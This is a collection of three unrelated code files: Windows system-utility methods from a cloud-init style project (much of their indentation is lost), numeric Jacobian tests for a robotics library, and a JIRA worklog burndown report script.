LOG.info('Waiting for sysprep completion. '
'GeneralizationState: %d', gen_state)
except WindowsError as ex:
if ex.winerror == 2:
LOG.debug('Sysprep data not found in the registry, '
'skipping sysprep completion check.')
else:
raise ex
def check_service_exists(self, service_name):
LOG.debug("Checking if service exists: %s", service_name)
try:
with self._get_service_handle(service_name):
return True
except pywintypes.error as ex:
if ex.winerror == winerror.ERROR_SERVICE_DOES_NOT_EXIST:
return False
raise
def get_service_status(self, service_name):
LOG.debug("Getting service status for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_STATUS) as hs:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
return self._SERVICE_STATUS_MAP.get(
state, WindowsUtils.SERVICE_STATUS_UNKNOWN)
def get_service_start_mode(self, service_name):
LOG.debug("Getting service start mode for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_CONFIG) as hs:
service_config = win32service.QueryServiceConfig(hs)
start_type = service_config[1]
return [k for k, v in self._SERVICE_START_TYPE_MAP.items()
if v == start_type][0]
def set_service_start_mode(self, service_name, start_mode):
# TODO(alexpilotti): Handle the "Delayed Start" case
LOG.debug("Setting service start mode for: %s", service_name)
start_type = self._get_win32_start_type(start_mode)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs, win32service.SERVICE_NO_CHANGE,
start_type, win32service.SERVICE_NO_CHANGE,
None, None, False, None, None, None, None)
def start_service(self, service_name):
LOG.debug('Starting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_START) as hs:
win32service.StartService(hs, service_name)
def stop_service(self, service_name, wait=False):
LOG.debug('Stopping service %s', service_name)
with self._get_service_handle(
service_name,
win32service.SERVICE_STOP |
win32service.SERVICE_QUERY_STATUS) as hs:
win32service.ControlService(hs, win32service.SERVICE_CONTROL_STOP)
if wait:
while True:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
if state == win32service.SERVICE_STOPPED:
return
time.sleep(.1)
@staticmethod
@contextlib.contextmanager
def _get_service_control_manager(
scm_access=win32service.SC_MANAGER_CONNECT):
hscm = win32service.OpenSCManager(None, None, scm_access)
try:
yield hscm
finally:
win32service.CloseServiceHandle(hscm)
@staticmethod
@contextlib.contextmanager
def _get_service_handle(service_name,
service_access=win32service.SERVICE_QUERY_CONFIG,
scm_access=win32service.SC_MANAGER_CONNECT):
with WindowsUtils._get_service_control_manager(scm_access) as hscm:
hs = win32service.OpenService(hscm, service_name, service_access)
try:
yield hs
finally:
win32service.CloseServiceHandle(hs)
@staticmethod
def _get_win32_start_type(start_mode):
start_type = WindowsUtils._SERVICE_START_TYPE_MAP.get(start_mode)
if not start_type:
raise exception.InvalidStateException(
"Invalid service start mode: %s" % start_mode)
return start_type
def create_service(self, service_name, display_name, path, start_mode,
username=None, password=None):
LOG.debug('Creating service %s', service_name)
start_type = self._get_win32_start_type(start_mode)
with WindowsUtils._get_service_control_manager(
scm_access=win32service.SC_MANAGER_CREATE_SERVICE) as hscm:
hs = win32service.CreateService(
hscm, service_name, display_name,
win32service.SERVICE_ALL_ACCESS,
win32service.SERVICE_WIN32_OWN_PROCESS,
start_type,
win32service.SERVICE_ERROR_NORMAL,
path, None, False, None,
username, password)
win32service.CloseServiceHandle(hs)
def delete_service(self, service_name):
LOG.debug('Deleting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_ALL_ACCESS) as hs:
win32service.DeleteService(hs)
def set_service_credentials(self, service_name, username, password):
LOG.debug('Setting service credentials: %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
None,
None,
False,
None,
username,
password,
None)
def get_service_username(self, service_name):
LOG.debug('Getting service username: %s', service_name)
with self._get_service_handle(service_name) as hs:
cfg = win32service.QueryServiceConfig(hs)
return cfg[7]
def reset_service_password(self):
"""This is needed to avoid pass the hash attacks."""
if not self.check_service_exists(self._service_name):
LOG.info("Service does not exist: %s", self._service_name)
return None
service_username = self.get_service_username(self._service_name)
# Ignore builtin accounts
if "\\" not in service_username:
LOG.info("Skipping password reset, service running as a built-in "
"account: %s", service_username)
return None
domain, username = service_username.split('\\')
if domain != ".":
LOG.info("Skipping password reset, service running as a domain "
"account: %s", service_username)
return None
LOG.debug('Resetting password for service user: %s', service_username)
maximum_length = self.get_maximum_password_length()
password = self.generate_random_password(maximum_length)
self.set_user_password(username, password)
self.set_service_credentials(
self._service_name, service_username, password)
return domain, username, password
def terminate(self):
# Wait for the service to start. Polling the service "Started" property
# is not enough
time.sleep(3)
self.stop_service(self._service_name)
def get_default_gateway(self):
default_routes = [r for r in self._get_ipv4_routing_table()
if r[0] == '0.0.0.0']
if default_routes:
return default_routes[0][3], default_routes[0][2]
else:
return None, None
@staticmethod
def _heap_alloc(heap, size):
table_mem = kernel32.HeapAlloc(heap, 0, ctypes.c_size_t(size.value))
if not table_mem:
raise exception.CloudbaseInitException(
'Unable to allocate memory for the IP forward table')
return table_mem
@contextlib.contextmanager
def _get_forward_table(self):
heap = kernel32.GetProcessHeap()
forward_table_size = ctypes.sizeof(Win32_MIB_IPFORWARDTABLE)
size = wintypes.ULONG(forward_table_size)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem, ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
try:
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err == self.ERROR_INSUFFICIENT_BUFFER:
kernel32.HeapFree(heap, 0, p_forward_table)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem,
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err and err != kernel32.ERROR_NO_DATA:
raise exception.CloudbaseInitException(
'Unable to get IP forward table. Error: %s' % err)
yield p_forward_table
finally:
kernel32.HeapFree(heap, 0, p_forward_table)
def _get_ipv4_routing_table(self):
routing_table = []
with self._get_forward_table() as p_forward_table:
forward_table = p_forward_table.contents
table = ctypes.cast(
ctypes.addressof(forward_table.table),
ctypes.POINTER(Win32_MIB_IPFORWARDROW *
forward_table.dwNumEntries)).contents
for row in table:
destination = Ws2_32.inet_ntoa(
row.dwForwardDest).decode()
netmask = Ws2_32.inet_ntoa(
row.dwForwardMask).decode()
gateway = Ws2_32.inet_ntoa(
row.dwForwardNextHop).decode()
routing_table.append((
destination,
netmask,
gateway,
row.dwForwardIfIndex,
row.dwForwardMetric1))
return routing_table
def check_static_route_exists(self, destination):
return len([r for r in self._get_ipv4_routing_table()
if r[0] == destination]) > 0
def add_static_route(self, destination, mask, next_hop, interface_index,
                     metric):
    """Add an IPv4 static route via the ROUTE ADD command.

    NOTE(review): the interface_index and metric parameters are
    accepted but never passed on the ROUTE ADD command line --
    confirm whether this is intentional before relying on either
    argument.
    """
    args = ['ROUTE', 'ADD', destination, 'MASK', mask, next_hop]
    (out, err, ret_val) = self.execute_process(args)
    # Cannot use the return value to determine the outcome
    if ret_val or err:
        raise exception.CloudbaseInitException(
            'Unable to add route: %s' % err)
def get_os_version(self):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
ret_val = ntdll.RtlGetVersion(ctypes.byref(vi))
if ret_val:
raise exception.WindowsCloudbaseInitException(
"RtlGetVersion failed with error: %s" % ret_val)
return {"major_version": vi.dwMajorVersion,
"minor_version": vi.dwMinorVersion,
"build_number": vi.dwBuildNumber,
"platform_id": vi.dwPlatformId,
"csd_version": vi.szCSDVersion,
"service_pack_major": vi.wServicePackMajor,
"service_pack_minor": vi.wServicePackMinor,
"suite_mask": vi.wSuiteMask,
"product_type": vi.wProductType}
def is_client_os(self):
return self.get_os_version()["product_type"] == self.VER_NT_WORKSTATION
def check_os_version(self, major, minor, build=0):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
vi.dwMajorVersion = major
vi.dwMinorVersion = minor
vi.dwBuildNumber = build
mask = 0
for type_mask in [VER_MAJORVERSION, VER_MINORVERSION, VER_BUILDNUMBER]:
mask = kernel32.VerSetConditionMask(mask, type_mask,
VER_GREATER_EQUAL)
type_mask = VER_MAJORVERSION | VER_MINORVERSION | VER_BUILDNUMBER
ret_val = ntdll.RtlVerifyVersionInfo(ctypes.byref(vi), type_mask, mask)
if not ret_val:
return True
elif ret_val == self.STATUS_REVISION_MISMATCH:
return False
else:
raise exception.CloudbaseInitException(
"RtlVerifyVersionInfo failed with error: %s" % ret_val)
def get_volume_label(self, drive):
max_label_size = 261
label = ctypes.create_unicode_buffer(max_label_size)
ret_val = kernel32.GetVolumeInformationW(six.text_type(drive), label,
max_label_size, 0, 0, 0, 0, 0)
if ret_val:
return label.value
def get_volume_path_names_by_mount_point(self, mount_point):
max_volume_name_len = 50
volume_name = ctypes.create_unicode_buffer(max_volume_name_len)
if not kernel32.GetVolumeNameForVolumeMountPointW(
six.text_type(mount_point), volume_name,
max_volume_name_len):
if kernel32.GetLastError() in [self.ERROR_INVALID_NAME,
self.ERROR_PATH_NOT_FOUND]:
raise exception.ItemNotFoundException(
"Mount point not found: %s" % mount_point)
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get volume name for mount point: %s. "
"Error: %%r" % mount_point)
volume_path_names_len = wintypes.DWORD(100)
while True:
volume_path_names = ctypes.create_unicode_buffer(
volume_path_names_len.value)
if not kernel32.GetVolumePathNamesForVolumeNameW(
volume_name, volume_path_names, volume_path_names_len,
ctypes.byref(volume_path_names_len)):
if kernel32.GetLastError() == self.ERROR_MORE_DATA:
continue
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get path names for volume name: %s."
"Error: %%r" % volume_name.value)
return [n for n in volume_path_names[
:volume_path_names_len.value - 1].split('\0') if n]
def generate_random_password(self, length):
    """Generate a random password of *length* characters that
    contains at least one lowercase letter, one uppercase letter and
    one digit, per the Windows complexity requirements:
    http://technet.microsoft.com/en-us/library/cc786468(v=ws.10).aspx

    Raises CloudbaseInitException for lengths below 3, since such a
    password cannot contain all three character classes.
    """
    if length < 3:
        raise exception.CloudbaseInitException(
            "Password can not have less than 3 characters!")
    required_classes = ("[a-z]", "[A-Z]", "[0-9]")
    while True:
        # Keep drawing candidates until one satisfies every class.
        candidate = super(WindowsUtils, self).generate_random_password(
            length)
        if all(re.search(pattern, candidate)
               for pattern in required_classes):
            return candidate
def _split_str_buf_list(self, buf, buf_len):
i = 0
value = ''
values = []
while i < buf_len:
c = buf[i]
if c != '\x00':
value += c
else:
values.append(value)
value = ''
i += 1
return values
def get_logical_drives(self):
buf_size = self.MAX_PATH
buf = ctypes.create_unicode_buffer(buf_size + 1)
buf_len = kernel32.GetLogicalDriveStringsW(buf_size, buf)
if not buf_len:
raise exception.WindowsCloudbaseInitException(
"GetLogicalDriveStringsW failed: %r")
return self._split_str_buf_list(buf, buf_len)
def get_cdrom_drives(self):
drives = self.get_logical_drives()
return [d for d in drives if kernel32.GetDriveTypeW(d) ==
self.DRIVE_CDROM]
def _is_64bit_arch(self):
# interpreter's bits
return struct.calcsize("P") == 8
def get_physical_disks(self):
physical_disks = []
disk_guid = GUID_DEVINTERFACE_DISK
handle_disks = setupapi.SetupDiGetClassDevsW(
ctypes.byref(disk_guid), None, None,
self.DIGCF_PRESENT | self.DIGCF_DEVICEINTERFACE)
if handle_disks == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
"SetupDiGetClassDevs failed")
try:
did = Win32_SP_DEVICE_INTERFACE_DATA()
did.cbSize = ctypes.sizeof(Win32_SP_DEVICE_INTERFACE_DATA)
index = 0
while setupapi.SetupDiEnumDeviceInterfaces(
handle_disks, None, ctypes.byref(disk_guid), index,
ctypes.byref(did)):
index += 1
handle_disk = self.INVALID_HANDLE_VALUE
required_size = wintypes.DWORD()
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), None, 0,
ctypes.byref(required_size), None):
if (kernel32.GetLastError() !=
self.ERROR_INSUFFICIENT_BUFFER):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
pdidd = ctypes.cast(
msvcrt.malloc(ctypes.c_size_t(required_size.value)),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W))
try:
pdidd.contents.cbSize = ctypes.sizeof(
Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W)
if not self._is_64bit_arch():
# NOTE(cpoieana): For some reason, on x86 platforms
# the alignment or content of the struct
# is not taken into consideration.
pdidd.contents.cbSize = 6
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), pdidd,
required_size, None, None):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
device_path = ctypes.cast(
pdidd.contents.DevicePath, wintypes.LPWSTR).value
handle_disk = kernel32.CreateFileW(
device_path, 0, self.FILE_SHARE_READ,
None, self.OPEN_EXISTING, 0, 0)
if handle_disk == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
'CreateFileW failed')
sdn = Win32_STORAGE_DEVICE_NUMBER()
b = wintypes.DWORD()
if not kernel32.DeviceIoControl(
handle_disk, self.IOCTL_STORAGE_GET_DEVICE_NUMBER,
None, 0, ctypes.byref(sdn), ctypes.sizeof(sdn),
ctypes.byref(b), None):
raise exception.WindowsCloudbaseInitException(
'DeviceIoControl failed: %r')
physical_disks.append(
r"\\.\PHYSICALDRIVE%d" % sdn.DeviceNumber)
finally:
msvcrt.free(pdidd)
if handle_disk != self.INVALID_HANDLE_VALUE:
kernel32.CloseHandle(handle_disk)
finally:
setupapi.SetupDiDestroyDeviceInfoList(handle_disks)
return physical_disks
def get_volumes(self):
"""Retrieve a list with all the volumes found on all disks."""
volumes = []
volume = ctypes.create_unicode_buffer(chr(0) * self.MAX_PATH)
handle_volumes = kernel32.FindFirstVolumeW(volume, self.MAX_PATH)
if handle_volumes == self.INVALID_HANDLE_VALUE:
raise exception.WindowsCloudbaseInitException(
"FindFirstVolumeW failed: %r")
try:
while True:
volumes.append(volume.value)
found = kernel32.FindNextVolumeW(handle_volumes, volume,
self.MAX_PATH)
if not found:
errno = ctypes.GetLastError()
if errno == self.ERROR_NO_MORE_FILES:
break
else:
raise exception.WindowsCloudbaseInitException(
"FindNextVolumeW failed: %r")
finally:
kernel32.FindVolumeClose(handle_volumes)
return volumes
def _get_fw_protocol(self, protocol):
if protocol == self.PROTOCOL_TCP:
fw_protocol = self._FW_IP_PROTOCOL_TCP
elif protocol == self.PROTOCOL_UDP:
fw_protocol = self._FW_IP_PROTOCOL_UDP
else:
raise NotImplementedError("Unsupported protocol")
return fw_protocol
def firewall_create_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_port = client.Dispatch("HNetCfg.FWOpenPort")
fw_port.Name = name
fw_port.Protocol = self._get_fw_protocol(protocol)
fw_port.Port = port
fw_port.Scope = self._FW_SCOPE_ALL
fw_port.Enabled = True
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_profile = fw_profile.GloballyOpenPorts.Add(fw_port)
def firewall_remove_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_protocol = self._get_fw_protocol(protocol)
fw_profile = fw_profile.GloballyOpenPorts.Remove(port, fw_protocol)
def is_wow64(self):
return win32process.IsWow64Process()
def get_system32_dir(self):
return os.path.expandvars('%windir%\\system32')
def get_syswow64_dir(self):
return os.path.expandvars('%windir%\\syswow64')
def get_sysnative_dir(self):
return os.path.expandvars('%windir%\\sysnative')
def check_sysnative_dir_exists(self):
sysnative_dir_exists = os.path.isdir(self.get_sysnative_dir())
if not sysnative_dir_exists and self.is_wow64():
LOG.warning('Unable to validate sysnative folder presence. '
'If Target OS is Server 2003 x64, please ensure '
'you have KB942589 installed')
return sysnative_dir_exists
def _get_system_dir(self, sysnative=True):
    r"""Return Windows system directory with compatibility support.

    Depending on the interpreter bits and platform architecture,
    the return value may vary between
    C:\Windows\(System32|SysWOW64|Sysnative).

    Note that "Sysnative" is just an alias (doesn't really exist on
    disk). More info about this can be found in documentation.
    """
    # Raw docstring: the original non-raw form contained invalid
    # escape sequences such as "\(".
    if sysnative and self.check_sysnative_dir_exists():
        return self.get_sysnative_dir()
    if not sysnative and self._is_64bit_arch():
        return self.get_syswow64_dir()
    return self.get_system32_dir()
def is_nano_server(self):
return self._check_server_level("NanoServer")
def _check_server_level(self, server_level):
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows NT\\CurrentVersion\\Server\\"
"ServerLevels") as key:
return winreg.QueryValueEx(key, server_level)[0] == 1
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def execute_powershell_script(self, script_path, sysnative=True):
base_dir = self._get_system_dir(sysnative)
powershell_path = os.path.join(base_dir,
'WindowsPowerShell\\v1.0\\'
'powershell.exe')
args = [powershell_path]
if not self.is_nano_server():
args += ['-ExecutionPolicy', 'RemoteSigned', '-NonInteractive',
'-File']
args.append(script_path)
return self.execute_process(args, shell=False)
def execute_system32_process(self, args, shell=True, decode_output=False,
sysnative=True):
base_dir = self._get_system_dir(sysnative)
process_path = os.path.join(base_dir, args[0])
return self.execute_process([process_path] + args[1:],
decode_output=decode_output, shell=shell)
def get_maximum_password_length(self):
return 20
def set_timezone(self, timezone_name):
windows_name = windows_tz.tz_win.get(timezone_name)
if not windows_name:
raise exception.CloudbaseInitException(
"The given timezone name is unrecognised: %r" % timezone_name)
timezone.Timezone(windows_name).set(self)
def is_real_time_clock_utc(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation') as key:
try:
utc = winreg.QueryValueEx(key, 'RealTimeIsUniversal')[0]
return utc != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
raise
def set_real_time_clock_utc(self, utc):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'RealTimeIsUniversal', 0,
winreg.REG_DWORD, 1 if utc else 0)
def get_page_files(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management') as key:
values = winreg.QueryValueEx(key, 'PagingFiles')[0]
page_files = []
for value in values:
v = value.split(" ")
path = v[0]
min_size_mb = int(v[1]) if len(v) > 1 else 0
max_size_mb = int(v[2]) if len(v) > 2 else 0
page_files.append((path, min_size_mb, max_size_mb))
return page_files
def set_page_files(self, page_files):
values = []
for path, min_size_mb, max_size_mb in page_files:
values.append("%s %d %d" % (path, min_size_mb, max_size_mb))
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'PagingFiles', 0,
winreg.REG_MULTI_SZ, values)
def enable_trim(self, enable):
    """Enables or disables TRIM delete notifications."""
    # fsutil's flag is "disabledeletenotify", so its sense is the
    # inverse of *enable*.
    args = ["fsutil.exe", "behavior", "set", "disabledeletenotify",
            "0" if enable else "1"]
    (out, err, ret_val) = self.execute_system32_process(args)
    if ret_val:
        # Message fixed: was the typo "configurating".
        raise exception.CloudbaseInitException(
            'TRIM configuration failed.\nOutput: %(out)s\nError:'
            ' %(err)s' % {'out': out, 'err': err})
def set_path_admin_acls(self, path):
LOG.debug("Assigning admin ACLs on path: %s", path)
# Sets ACLs for "NT AUTHORITY\SYSTEM" and "BUILTIN\Administrators"
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"icacls.exe", path, "/inheritance:r", "/grant:r",
"*S-1-5-18:(OI)(CI)F", "*S-1-5-32-544:(OI)(CI)F"])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to set path ACLs.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def take_path_ownership(self, path, username=None):
if username:
raise NotImplementedError()
LOG.debug("Taking ownership of path: %s", path)
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"takeown.exe", "/F", path])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to take path ownership.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def check_dotnet_is_installed(self, version):
    """Return True when the .NET Framework 4 Full profile is installed.

    Only version "4" is supported; detection reads the 'Install'
    registry value under NDP\\v4\\Full, treating a missing key
    (winerror 2) as "not installed".
    """
    # See: https://msdn.microsoft.com/en-us/library/hh925568(v=vs.110).aspx
    if str(version) != "4":
        raise exception.CloudbaseInitException(
            "Only checking for version 4 is supported at the moment")
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
                            'Microsoft\\NET Framework Setup\\NDP\\'
                            'v%s\\Full' % version) as key:
            return winreg.QueryValueEx(key, 'Install')[0] != 0
    except WindowsError as ex:
        if ex.winerror == 2:
            return False
        else:
            raise
def get_file_version(self, path):
    """Return the file version of *path* as a
    (major, minor, build, revision) tuple read from the file's
    Win32 version resource.
    """
    info = win32api.GetFileVersionInfo(path, '\\')
    ms = info['FileVersionMS']
    ls = info['FileVersionLS']
    return (win32api.HIWORD(ms), win32api.LOWORD(ms),
            win32api.HIWORD(ls), win32api.LOWORD(ls))
def get_default_script_exec_header(self):
    """Return the default header for user scripts (cmd on Windows)."""
    return constant.SCRIPT_HEADER_CMD
|
<reponame>JeroenDM/acrobotics
import numpy as np
import acrobotics as ab
from numpy.testing import assert_almost_equal
NUM_RANDOM_TESTS = 10
def numeric_jacobian(fun, qi):
    """Approximate the Jacobian of *fun* at *qi* via forward differences.

    *fun* maps a 1-D array of length n_in to a 1-D array of length
    n_out; the result has shape (n_out, n_in). The 1e-7 step trades
    truncation error against rounding error for double precision.
    """
    step = 1e-7
    base_value = fun(qi)
    perturbations = np.eye(len(qi)) * step
    columns = [(fun(qi + delta) - base_value) / step
               for delta in perturbations]
    return np.column_stack(columns)
def dummy_f(x):
    """Simple R^2 -> R^3 function used to test numerical differentiation."""
    assert len(x) == 2
    return np.array([np.sin(x[0]),
                     np.cos(x[1]),
                     x[0] + x[1] ** 2])
def dummy_f_diff(x):
    """Analytic Jacobian of dummy_f, shape (3, 2)."""
    return np.array([
        [np.cos(x[0]), 0.0],
        [0.0, -np.sin(x[1])],
        [1.0, 2 * x[1]],
    ])
def test_numerical_diff():
    """Check numeric_jacobian against the analytic Jacobian of dummy_f
    at several random points.
    """
    for _ in range(NUM_RANDOM_TESTS):
        point = np.random.rand(2)
        assert_almost_equal(dummy_f_diff(point),
                            numeric_jacobian(dummy_f, point))
def test_planer_arm():
    """Compare the planar arm's analytic position Jacobian against a
    numeric one at random joint configurations.
    """
    robot = ab.PlanarArm()
    for _ in range(NUM_RANDOM_TESTS):
        q = np.random.rand(robot.ndof)
        j_exact = robot.jacobian_position(q)
        # Numeric Jacobian of the translation part of the forward
        # kinematics (last column, first three rows of the 4x4 pose).
        j_approx = numeric_jacobian(lambda q: robot.fk(q)[:3, 3], q)
        assert_almost_equal(j_exact, j_approx)
def test_planer_arm_rpy():
    """Compare the planar arm's analytic RPY Jacobian against a
    numeric one at random joint configurations.
    """
    robot = ab.PlanarArm()
    q = np.random.rand(robot.ndof)
    # NOTE(review): leftover debug print; it also doubles as a smoke
    # call of fk_rpy_casadi -- confirm before removing.
    print(robot.fk_rpy_casadi(q))
    for _ in range(NUM_RANDOM_TESTS):
        q = np.random.rand(robot.ndof)
        j_exact = robot.jacobian_rpy(q)
        j_approx = numeric_jacobian(lambda q: robot.fk_rpy(q), q)
        assert_almost_equal(j_exact, j_approx)
def test_kuka():
    """Position Jacobian of the Kuka arm matches finite differences."""
    robot = ab.Kuka()
    position_fk = lambda joints: robot.fk(joints)[:3, 3]
    for _ in range(NUM_RANDOM_TESTS):
        joints = np.random.rand(robot.ndof)
        assert_almost_equal(robot.jacobian_position(joints),
                            numeric_jacobian(position_fk, joints))
def test_kuka_rpy():
    """RPY Jacobian of the Kuka arm matches finite differences."""
    robot = ab.Kuka()
    joints = np.random.rand(robot.ndof)
    print(robot.fk_rpy_casadi(joints))  # kept: also exercises the casadi FK path
    for _ in range(NUM_RANDOM_TESTS):
        joints = np.random.rand(robot.ndof)
        exact = robot.jacobian_rpy(joints)
        approx = numeric_jacobian(robot.fk_rpy, joints)
        # Position rows at default precision; orientation rows slightly looser.
        assert_almost_equal(exact[:3, :], approx[:3, :])
        assert_almost_equal(exact[3:, :], approx[3:, :], decimal=5)
|
<reponame>jpodeszwik/jira-burndown-report-generator
#!/usr/bin/env python3
import requests
import sys
from requests.auth import HTTPBasicAuth
from itertools import groupby
import dateutil.parser
from datetime import timedelta
# Command-line arguments: JIRA REST API root, credentials, the worklog
# author to report on, and the date range (YYYY-MM-DD) of the report.
api_root = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
name = sys.argv[4]
start_date = sys.argv[5]
end_date = sys.argv[6]
auth = HTTPBasicAuth(username, password)
def find_issues_links():
    """Search JIRA for issues the user logged work on inside the date range.

    Returns a list of {'key': ..., 'url': ...} dicts, one per issue found.
    """
    jql = ('worklogAuthor = ' + name + ' and worklogDate > ' + start_date +
           ' and worklogDate < ' + end_date)
    url = api_root + '/search'
    print(url, file=sys.stderr)
    response = requests.post(url, json={'jql': jql}, auth=auth)
    found = response.json()['issues']
    return [{'key': item['key'], 'url': item['self']} for item in found]
def parse_estimations(estimations):
    """Extract an estimation in hours from JIRA role-based estimation strings.

    Each entry looks like ``'Role: <role> (<seconds>)'``.  The 'Developer'
    role wins when present and numeric; otherwise the generic role '-1' is
    used; otherwise 0 is returned.
    """
    def _seconds(entry):
        # Text after the first '(' holds the seconds; tolerate a closing ')'.
        # (The original kept the ')' attached, so numeric developer values
        # were never recognized and generic values crashed int().)
        return entry.split('(')[1].rstrip(')')

    developer = [e for e in estimations if e.startswith('Role: Developer')]
    if developer and _seconds(developer[0]).isdigit():
        return int(_seconds(developer[0])) / 3600
    generic = [e for e in estimations if e.startswith('Role: -1')]
    if generic:
        return int(_seconds(generic[0])) / 3600
    return 0
def is_in_date_range(date):
    """True when the ISO date string falls within [start_date, end_date] inclusive."""
    # end_date is inclusive, so compare strictly below end_date + 1 day.
    upper_bound = (dateutil.parser.parse(end_date) + timedelta(days=1)).isoformat()
    return start_date <= date < upper_bound
def sum_times(person_logs):
    """Total hours for one person, flagging work logged mostly outside the range.

    'other_sprint' is True when less than half of the person's total time
    falls inside the reported date range.
    """
    total_hours = sum(log['time'] for log in person_logs) / 3600
    in_range_hours = sum(
        log['time'] for log in person_logs if is_in_date_range(log['started'])
    ) / 3600
    return {'total': total_hours, 'other_sprint': total_hours > in_range_hours * 2}
def is_owner(people_time):
    """True when the report's user logged at least as much time as anyone else."""
    best = max(entry['total'] for entry in people_time.values())
    return best == people_time[name]['total']
def parse_issue(issue):
    """Fetch one issue from JIRA and reduce it to the report's per-issue record.

    Returns a dict with the issue key, summary, status, the estimation,
    hours logged by the report's user, whether that user is the issue
    "owner" (logged the most time), and whether most of the user's work
    happened outside the reported date range.
    """
    print(issue['url'], file=sys.stderr)
    r = requests.get(issue['url'], auth=auth)
    js = r.json()
    fields = js['fields']
    # customfield_12340 holds role-based estimations; fall back to the plain
    # original estimate when absent.
    # NOTE(review): parse_estimations returns hours while timeoriginalestimate
    # is raw (presumably seconds) — confirm the units are intended to differ.
    estimations = parse_estimations(fields['customfield_12340']) if fields['customfield_12340'] is not None else fields['timeoriginalestimate']
    worklog = fields['worklog']
    summary = fields['summary']
    # The embedded worklog is paginated; re-fetch the full list if truncated.
    if worklog['maxResults'] < worklog['total']:
        url = issue['url'] + '/worklog'
        print(url, file=sys.stderr)
        worklog = requests.get(url, auth=auth).json()
    worklogs = worklog['worklogs']
    wl = [{'person' : worklog['author']['name'], 'time': worklog['timeSpentSeconds'], 'started': worklog['started']} for worklog in worklogs]
    # Group the flat worklog entries per person (groupby needs sorted input).
    keyfunc = lambda x : x['person']
    wl = sorted(wl, key=keyfunc)
    groupped = groupby(wl, keyfunc)
    people_time = {person: sum_times(list(logs)) for person, logs in groupped}
    own_time = people_time[name]
    status = fields['status']['name']
    return { 'key' : issue['key'], 'summary': summary, 'estimation': estimations, 'logged': own_time['total'], 'owner': is_owner(people_time), 'other_sprint': own_time['other_sprint'], 'status': status }
# ---- Report generation (runs at import time, as a script) ----
print('Report {} {} - {}'.format(name, start_date, end_date))
issues = find_issues_links()
# KID-1 is excluded explicitly — presumably a bookkeeping issue; confirm.
parsed_issues = [parse_issue(issue) for issue in issues if issue['key'] != 'KID-1']
# Refinement meetings are reported separately from regular work.
refinement_issues = [issue for issue in parsed_issues if 'Refinement' in issue['summary']]
refinement_work = sum([issue['logged'] for issue in refinement_issues])
print('Refinements work: {}'.format(refinement_work))
issues_without_refinements = [issue for issue in parsed_issues if 'Refinement' not in issue['summary']]
issues_without_refinements = [issue for issue in issues_without_refinements if 'Angular training' not in issue['summary']]
